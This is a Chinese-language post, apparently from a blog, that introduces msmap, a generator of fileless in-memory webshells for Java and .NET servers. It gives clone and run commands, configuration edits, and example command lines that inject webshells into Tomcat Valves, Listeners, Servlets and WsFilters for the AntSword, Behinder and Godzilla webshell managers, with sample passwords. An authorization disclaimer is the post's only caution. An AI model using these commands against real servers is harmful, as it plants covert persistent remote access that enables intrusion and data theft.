內存馬生成器 -- msmap?

0x01 工具介紹

Msmap是一個內存馬生成器，兼容多種容器、組件、編碼器、WebShell / Proxy / Killer 和管理客戶端。本文中涉及到的所有操作均得到了客戶單位的授權，并且在漏洞修復后得以公開。請勿在未授權狀態下進行任何形式的滲透測試！！！！

0x02 安裝與使用

1、一般使用方法

git clone git@github.com:hosch3n/msmap.git
cd msmap
python generator.py
[注意] 盡量用獨一無二的密碼；各選項大小敏感

2、進階使用方法

編輯 config/environment.py
# 自動編譯
auto_build = True
# Base64編碼類字節碼
b64_class = True
# 生成腳本
generate_script = True
# 編譯器絕對路徑
java_compiler_path = r"~/jdk1.6.0_04/bin/javac"
dotnet_compiler_path = r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"
編輯 gist/java/container/tomcat/servlet.py
// Servlet路徑匹配規則
private static String pattern = "*.xml";
WsFilter暫不支持自動編譯。如果使用了加密編碼器，密碼需要與路徑相同（如/passwd）

3、蟻劍

JSP類型 搭配 default 編碼器 | 注入到 Tomcat Valve
python generator.py Java Tomcat Valve RAW AntSword passwd
JSP類型 搭配 aes_128_ecb_pkcs7_padding_md5 編碼器 | 注入到 Tomcat Listener
python generator.py Java Tomcat Listener AES128 AntSword passwd
JSP類型 搭配 rc_4_sha256 編碼器 | 注入到 Tomcat Servlet
python generator.py Java Tomcat Servlet RC4 AntSword passwd
JSPJS類型 搭配 aes_128_ecb_pkcs7_padding_md5 編碼器 | 注入到 Tomcat WsFilter
python generator.py Java Tomcat WsFilter AES128 JSPJS passwd

4、冰蝎

default_aes類型 | 注入到 Tomcat Valve
python generator.py Java Tomcat Valve AES128 Behinder rebeyond

5、哥斯拉

JAVA_AES_BASE64類型 | 注入到 Tomcat Valve
python generator.py Java Tomcat Valve AES128 Godzilla superidol

0x03 下載地址

項目地址：https://github.com/hosch3n/msmap